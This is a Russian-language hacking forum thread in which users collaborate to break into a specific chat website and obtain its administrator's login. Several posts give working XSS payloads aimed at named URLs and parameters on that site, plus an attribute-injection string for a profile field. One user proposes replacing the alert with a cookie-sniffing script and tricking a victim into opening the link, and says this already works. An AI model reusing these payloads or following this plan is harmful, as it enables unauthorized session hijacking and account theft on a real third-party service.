|
Помогите взломать !!!!
http://chat.russianamerica.com:8080/ помогите узнать логин админа и код с уважением Автоматический гранатамёт Стечкина.
|
Не нравиц мне та надпись Russian Amerika, будет время помогу!!!!!
|
помоги чем можешь.
|
первое че брасаеться в глаза это пасив на главной странице
Код:
http://chat.russianamerica.com:8080/login?login=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eбуду смотреть дальше... -- в профиле не фильтруються двойные кавычки |
вот и я нашел
http://chat.russianamerica.com:8080/StPic?n='><script>alert(/Kaban/)</script> XSS эта вроде работает, только когда под ником сидишь |
Цитата:
осталось заместо алерта подставить скрипт для сниффера и впарить комут ссылку! уже проверил работает! |
вроде тоже проходит
http://chat.russianamerica.com:8080/Gallery?s=%22%3E%3Cscript%3Ealert(/Kaban/)%3C/script%3E |
Еще нашол в профиле полуактивную xss в поле Домашняя страничка: вставляеш
Код:
" onmouseover=javascript:alert(document.cookie) " |
Хакеры а что именно открываеться что то я не пойму что можно с этим делать и что логин и пароль админа не узнать?
|
вот в этой статье всё прекрасно описано что делать, как делать и зачем делать.
http://forum.antichat.ru/thread20140.html |
| Время: 06:34 |